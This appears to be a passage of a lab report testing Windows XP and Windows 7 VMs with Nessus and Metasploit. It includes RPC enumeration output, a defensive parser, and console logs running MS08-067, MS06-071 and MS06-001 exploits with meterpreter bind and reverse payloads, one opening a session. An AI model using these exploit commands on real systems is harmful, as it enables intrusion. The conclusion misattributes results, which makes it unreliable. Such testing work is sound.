UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0
Description : Unknown RPC service
Annotation : IKE/Authip API
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0
Description : Unknown RPC service
Annotation : IKE/Authip API
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0
Description : Unknown RPC service
Annotation : IKE/Authip API
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0
Description : Unknown RPC service
Annotation : Event log TCPIP
Type : Local RPC service
Named pipe : eventlog
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0
Description : Unknown RPC service
Annotation : NRP server endpoint
Type : Local RPC service
Named pipe : eventlog
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0
Description : Unknown RPC service
Annotation : NRP server endpoint
Type : Local RPC service
Named pipe : AudioClientRpc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0
Description : Unknown RPC service
Annotation : NRP server endpoint
Type : Local RPC service
Named pipe : Audiosrv
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0
Description : DHCP Client Service
Windows process : svchost.exe
Annotation : DHCP Client LRPC Endpoint
Type : Local RPC service
Named pipe : eventlog
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0
Description : DHCP Client Service
Windows process : svchost.exe
Annotation : DHCP Client LRPC Endpoint
Type : Local RPC service
Named pipe : AudioClientRpc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0
Description : DHCP Client Service
Windows process : svchost.exe
Annotation : DHCP Client LRPC Endpoint
Type : Local RPC service
Named pipe : Audiosrv
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0
Description : DHCP Client Service
Windows process : svchost.exe
Annotation : DHCP Client LRPC Endpoint
Type : Local RPC service
Named pipe : dhcpcsvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0
Description : Unknown RPC service
Annotation : DHCPv6 Client LRPC Endpoint
Type : Local RPC service
Named pipe : eventlog
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0
Description : Unknown RPC service
Annotation : DHCPv6 Client LRPC Endpoint
Type : Local RPC service
Named pipe : AudioClientRpc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0
Description : Unknown RPC service
Annotation : DHCPv6 Client LRPC Endpoint
Type : Local RPC service
Named pipe : Audiosrv
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0
Description : Unknown RPC service
Annotation : DHCPv6 Client LRPC Endpoint
Type : Local RPC service
Named pipe : dhcpcsvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0
Description : Unknown RPC service
Annotation : DHCPv6 Client LRPC Endpoint
Type : Local RPC service
Named pipe : dhcpcsvc6
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0
Description : Unknown RPC service
Annotation : Security Center
Type : Local RPC service
Named pipe : eventlog
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0
Description : Unknown RPC service
Annotation : Security Center
Type : Local RPC service
Named pipe : AudioClientRpc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0
Description : Unknown RPC service
Annotation : Security Center
Type : Local RPC service
Named pipe : Audiosrv
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0
Description : Unknown RPC service
Annotation : Security Center
Type : Local RPC service
Named pipe : dhcpcsvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0
Description : Unknown RPC service
Annotation : Security Center
Type : Local RPC service
Named pipe : dhcpcsvc6
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0
Description : Unknown RPC service
Annotation : Security Center
Type : Local RPC service
Named pipe : OLEE4C5DBF62E0E4163A84295240E81
Nessus ID : 10736
Port rtsp (554/tcp)
Port icslap (2869/tcp)
Port netbios-ssn (139/tcp)
SMB Detection
Synopsis :
A file / print sharing service is listening on the remote host.
Description :
The remote service understands the CIFS (Common Internet File System)
or Server Message Block (SMB) protocol, used to provide shared access
to files, printers, etc between nodes on a network.
Solution :
n/a
Risk factor :
None
Plugin output :
An SMB server is running on this port.
Nessus ID : 11011
Port unknown (49299/tcp)
DCE Services Enumeration
Synopsis :
A DCE/RPC service is running on the remote host.
Description :
By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe.
Solution :
N/A
Risk factor :
None
Plugin output :
The following DCERPC services are available on TCP port 49299 :
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0
Description : IPsec Services (Windows XP & 2003)
Windows process : lsass.exe
Annotation : IPSec Policy agent endpoint
Type : Remote RPC service
TCP Port : 49299
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 6b5bdd1e-528c-422c-af8c-a4079be4fe48, version 1.0
Description : Unknown RPC service
Annotation : Remote Fw APIs
Type : Remote RPC service
TCP Port : 49299
IP : 192.168.0.171
Nessus ID : 10736
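The plugin description above explains how the endpoint-mapper lookup produces this listing; what a defender then needs is to turn the listing into an inventory. As an added example (not code from the report or from Nessus), the Python below parses plugin 10736 output in the layout shown, separates interfaces bound to a TCP port, which another host can bind to, from those reachable only through a local named pipe, and repairs lines that PDF extraction ran together; the sample input is constructed from values that appear in the report.

```python
import re
from collections import defaultdict

# Field names plugin 10736 prints; FUSED_RE repairs lines that PDF extraction
# ran together ("Type : Local RPC serviceNamed pipe : eventlog").
KEYS = ("Object UUID", "UUID", "Description", "Windows process",
        "Annotation", "Type", "Named pipe", "TCP Port", "IP")
FUSED_RE = re.compile(r"(?<=\S)(?=(?:%s) : )" % "|".join(map(re.escape, KEYS)))
UUID_RE = re.compile(r"^([0-9a-f-]{36}), version (\d+\.\d+)$", re.I)

# Constructed sample in the report's own layout (UUIDs, pipe name and address
# are values from the report; the last line is fused the way the PDF text is).
SAMPLE_OUTPUT = """\
The following DCERPC services are available on TCP port 49299 :
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0
Description : IPsec Services (Windows XP & 2003)
Windows process : lsass.exe
Annotation : IPSec Policy agent endpoint
Type : Remote RPC service
TCP Port : 49299
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0
Description : DHCP Client Service
Windows process : svchost.exe
Annotation : DHCP Client LRPC Endpoint
Type : Local RPC serviceNamed pipe : dhcpcsvc
"""

def parse_dcerpc_output(text):
    """One dict per endpoint record (a record starts at 'Object UUID');
    the interface UUID/version are split out, other fields keep raw values."""
    records, current = [], None
    for raw in text.splitlines():
        for line in FUSED_RE.split(raw):
            line = line.strip()
            if " : " not in line:
                continue  # banner line ('The following ...') or blank line
            key, value = (p.strip() for p in line.split(" : ", 1))
            if key == "Object UUID":
                current = {"object_uuid": value}
                records.append(current)
            elif current is None:
                continue  # field with no record header yet: ignore it
            elif key == "UUID":
                m = UUID_RE.match(value)
                current["uuid"] = (m.group(1) if m else value).lower()
                current["version"] = m.group(2) if m else None
            else:
                current[key.lower().replace(" ", "_")] = value
    return records

def endpoint_inventory(records):
    """Group endpoints by interface UUID: named pipes that expose it to local
    callers versus IP:port pairs that expose it over the network."""
    inv = defaultdict(lambda: {"annotation": None, "pipes": set(), "tcp": set()})
    for r in records:
        if not r.get("uuid"):
            continue
        entry = inv[r["uuid"]]
        entry["annotation"] = r.get("annotation") or entry["annotation"]
        if r.get("type") == "Remote RPC service" and "tcp_port" in r:
            entry["tcp"].add((r.get("ip"), int(r["tcp_port"])))
        elif "named_pipe" in r:
            entry["pipes"].add(r["named_pipe"])
    return dict(inv)

def network_exposed(records):
    """Sorted (uuid, ip, port) for interfaces bound to a TCP endpoint: another
    host can bind to these, so review them against firewall policy and patch state first."""
    return sorted((uuid, ip, port)
                  for uuid, e in endpoint_inventory(records).items()
                  for ip, port in e["tcp"])

if __name__ == "__main__":
    recs = parse_dcerpc_output(SAMPLE_OUTPUT)
    for uuid, ip, port in network_exposed(recs):
        print(f"{uuid} bound at {ip}:{port}")
```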
PENETRATION TESTING (METASPLOIT)
Metasploit, specifically the Metasploit Framework, is an open-source tool used for penetration testing and signature development. The tool presents nearly endless combinations of exploits and payloads that can be used to test multiple aspects of a remote machine's security. As such, it was used to test penetrable points in both the Windows XP and Windows 7 virtual machines. This was done using the following combination of exploits and payloads.

The exploit and payload information was taken from the information dialogs provided within Metasploit 3.3. Following the exploit and payload information are the test results from the remote host testing. Six tests were performed on each virtual machine, and the test process is detailed. For complete installation and setup of Metasploit, refer to the Vantage Point Computing Policy Document.
EXPLOITS
MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION
Command: msf > windows/smb/ms08_067_netapi
Version: 5888
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Payload information:
Space: 400
Avoid: 8 characters
Description:
This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server
Service. This module is capable of bypassing NX on some operating systems and service packs. The
correct target must be used to prevent the Server Service (along with a dozen others in the same
process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module; full support for NX bypass on 2003, along with other platforms, is still in development.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING
Command: msf > windows/browser/ms06_071_xml_core
Version: 5773
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Payload information:
Space: 1024
Avoid: 1 character
Description:
This module exploits a code execution vulnerability in Microsoft XML Core Services which exists in
the XMLHTTP ActiveX control. This module is the modified version of
http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully
tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6 + Microsoft
XML Core Services 4.0 SP2.
References:
http://www.microsoft.com/technet/security/bulletin/MS06-071.mspx
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-5745
http://www.securityfocus.com/bid/20915
http://www.osvdb.org/29425
WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTION
Command: msf > windows/browser/ms06_001_wmf_setabortproc
Version: 7611
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Payload information:
Space: 1040
Avoid: 1 characters
Description:
This module exploits a vulnerability in the GDI library included with Windows XP and 2003. This vulnerability uses the 'Escape' metafile function to execute arbitrary code through the SetAbortProc procedure. This module generates a random WMF record stream for each request.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-4560
http://www.osvdb.org/21987
http://www.microsoft.com/technet/security/bulletin/MS06-001.mspx
http://www.securityfocus.com/bid/16074
http://www.microsoft.com/technet/security/advisory/912840.mspx
http://wvware.sourceforge.net/caolan/ora-wmf.html
http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt
PAYLOADS
WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER
Command: msf> windows/meterpreter/bind_tcp
Version: 7075, $Revision$, 7546
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 298
Description:
Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload
WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER
Command: msf> windows/meterpreter/reverse_tcp
Version: 7217, $Revision$, 7546
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 290
Description:
Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload
WINDOWS XP
TEST 1
MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION
WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set rhost 192.168.0.166
rhost => 192.168.0.166
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
TEST 2
MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION
WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.0.166
lhost => 192.168.0.166
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
TEST 3
INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING
WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER
msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms06_071_xml_core) > set rhost 192.168.0.166
rhost => 192.168.0.166
msf exploit(ms06_071_xml_core) > exploit
[*] Exploit running as background job.
[*] Started bind handler
[*] Using URL: http://0.0.0.0:8080/Ylyb4Hd
[*] Local IP: http://192.168.0.196:8080/Ylyb4Hd
[*] Server started.
TEST 4
INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING
WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER
msf > use windows/browser/ms06_071_xml_core
msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms06_071_xml_core) > set lhost 192.168.0.166
lhost => 192.168.0.166
msf exploit(ms06_071_xml_core) > exploit
[*] Exploit running as background job.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/VCk957jpkpSW6J3
[*] Local IP: http://192.168.0.196:8080/VCk957jpkpSW6J3
[*] Server started.
TEST 5
WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTION
WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER
msf > use windows/browser/ms06_001_wmf_setabortproc
msf exploit(ms06_001_wmf_setabortproc) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms06_001_wmf_setabortproc) > set rhost 192.168.0.166
rhost => 192.168.0.166
msf exploit(ms06_001_wmf_setabortproc) > exploit
[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) >
[*] Started bind handler
[*] Using URL: http://0.0.0.0:8080/I0R0jq7Efcxn08
[*] Local IP: http://192.168.0.196:8080/I0R0jq7Efcxn08
[*] Server started.
TEST 6
WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTION
WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER
msf > use windows/browser/ms06_001_wmf_setabortproc
msf exploit(ms06_001_wmf_setabortproc) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms06_001_wmf_setabortproc) > set rhost 192.168.0.166
rhost => 192.168.0.166
msf exploit(ms06_001_wmf_setabortproc) > set lhost 192.168.0.166
lhost => 192.168.0.166
msf exploit(ms06_001_wmf_setabortproc) > exploit
[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) >
[*] Using URL: http://0.0.0.0:8080/c5wMfJ8gXdTk
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.196:8080/c5wMfJ8gXdTk
[*] Server started.
WINDOWS 7
TEST 1
MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION
WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bindtcp
[-] The value specified for payload is not valid.
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set rhost 192.168.0.171
rhost => 192.168.0.171
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 7 Professional (Build 7600) - lang:Unknown
[*] Could not determine the exact language pack
[*] Exploit completed, but no session was created.
TEST 2
MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION
WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.0.171
lhost => 192.168.0.171
msf exploit(ms08_067_netapi) > set rhost 192.168.0.171
rhost => 192.168.0.171
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 7 Professional (Build 7600) - lang:Unknown
[*] Could not determine the exact language pack
[*] Exploit completed, but no session was created.
TEST 3
INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING
WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER
msf > use windows/browser/ms06_071_xml_core
msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms06_071_xml_core) > set rhost 192.168.0.171
rhost => 192.168.0.171
msf exploit(ms06_071_xml_core) > exploit
[*] Exploit running as background job.
msf exploit(ms06_071_xml_core) > [*] Started bind handler
[*] Using URL: http://0.0.0.0:8080/H2MNFt9yRjH4N0q
[*] Local IP: http://192.168.0.196:8080/H2MNFt9yRjH4N0q
[*] Server started.
TEST 4
INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING
WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER
msf > use windows/browser/ms06_071_xml_core
msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms06_071_xml_core) > set rhost 192.168.0.171
rhost => 192.168.0.171
msf exploit(ms06_071_xml_core) > set lhost 192.168.0.171
lhost => 192.168.0.171
msf exploit(ms06_071_xml_core) > exploit
[*] Exploit running as background job.
msf exploit(ms06_071_xml_core) > [*] Started reverse handler on port 4444
[*] Using URL: http://0.0.0.0:8080/m8MRYtwpxBsaeP
[*] Local IP: http://192.168.0.196:8080/m8MRYtwpxBsaeP
[*] Server started.
TEST 5
WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTION
WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER
msf > use windows/browser/ms06_001_wmf_setabortproc
msf exploit(ms06_001_wmf_setabortproc) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms06_001_wmf_setabortproc) > set rhost 192.168.0.171
rhost => 192.168.0.171
msf exploit(ms06_001_wmf_setabortproc) > exploit
[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) >
[*] Started bind handler
[*] Using URL: http://0.0.0.0:8080/LJTnPF9ZUf
[*] Local IP: http://192.168.0.196:8080/LJTnPF9ZUf
[*] Server started.
[*] Started bind handler
[*] Sending exploit to 192.168.0.196:1199...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.0.196:1201 -> 192.168.0.196:4444)
TEST 6
WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTION
WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER
msf > use windows/browser/ms06_001_wmf_setabortproc
msf exploit(ms06_001_wmf_setabortproc) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms06_001_wmf_setabortproc) > set rhost 192.168.0.171
rhost => 192.168.0.171
msf exploit(ms06_001_wmf_setabortproc) > set lhost 192.168.0.171
lhost => 192.168.0.171
msf exploit(ms06_001_wmf_setabortproc) > exploit
[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) > [*] Started reverse handler on port 4444
[*] Using URL: http://0.0.0.0:8080/JfNUisgBdnRRa
[*] Local IP: http://192.168.0.196:8080/JfNUisgBdnRRa
[*] Server started.
[*] Sending exploit to 192.168.0.196:1267...
CONCLUSION
As with any scientific test, empirical evidence must be presented in order to draw legitimate conclusions. In addition, test results must be corroborated in order to verify their authenticity. This is the reason that multiple tools were used to test the security of the two remote machines (the virtual machines). While NMap, Nessus, and Metasploit have different specialties, they are all necessary pieces of a larger puzzle: computer security.

In order to fully verify true security, the tools must be considered together. For instance, basing results strictly on NMap scans would yield the conclusion that Windows XP is far more secure than Windows 7, because Windows XP has no unfiltered ports and Windows 7 has seven "open ports." However, the Nessus scan concludes that Windows XP has five open ports and Windows 7 has twelve. Additionally, there are multiple low vulnerabilities present in each operating system.

The vulnerabilities present in each operating system have the same underlying processes: Server Message Block (SMB) and Distributed Computing Environment (DCE). SMB is an application-layer protocol that provides shared access to computing resources like files, printers, and ports. Reduced to the most basic level, it functions as the "Microsoft Windows Network." DCE is a software system that functions as a framework for client/server interactions. The most pertinent aspect is the remote procedure call system, which allows work to be performed across multiple computers.

While the aforementioned processes are both issues, the important thing to consider is their presence in the operating systems. These vulnerabilities are not limited to one particular version of the Windows operating system (though Windows 7 does have more low-priority vulnerabilities); they are present in both of them. These vulnerabilities exist below the level of average user interaction, so they remain invisible to most users.

This is why they are the most dangerous types of vulnerabilities: they require no out-of-the-box user configuration to compromise the system. For instance, installing iTunes, Winamp, or MediaMonkey will make the system vulnerable in certain ways; users sign up for those vulnerabilities when they install the programs. Because of this, Metasploit exploit and payload combinations were chosen that target vulnerabilities related to base-level functionality like SMB, DCE, and TCP networking.

Both systems were equally vulnerable to actual penetration. Metasploit Tests 1 & 2 were unable to start servers on both the XP and 7 hosts. However, Tests 3 & 4 successfully created servers on both the Windows XP and 7 machines: a server which was able to successfully open a corrupt .wmf or image file when the link to the created server was used. This is particularly odd given the fact that NMap and Nessus reported different open ports and vulnerabilities.

Ultimately, both operating systems have exploitable vulnerabilities that are present, even with patching and no superfluous programs installed. The lesson is that removing end-users from
the picture does not completely remove potential security issues. Only true diligence on the part of the security personnel can truly harden a system.

Windows XP is an industrial, no-frills operating system that was revolutionary when it was originally released in 2001. Windows 7 is a multimedia operating system aimed more at the general public than at the enterprise. Given the relative ubiquity of Moore's Law, end-users will be more familiar with Windows 7 than Windows XP in a year and a half. As such, it makes sense to begin to learn the Windows 7 platform, because it does not lack the base functionality that Windows Vista had. Windows 7 is basically Windows XP with a better user interface, better user access control, and more frills. Microsoft may have neglected to patch some of the existing holes, but they really went back to the drawing board with all the other aspects, and it should be integrated into the enterprise upgrade plan.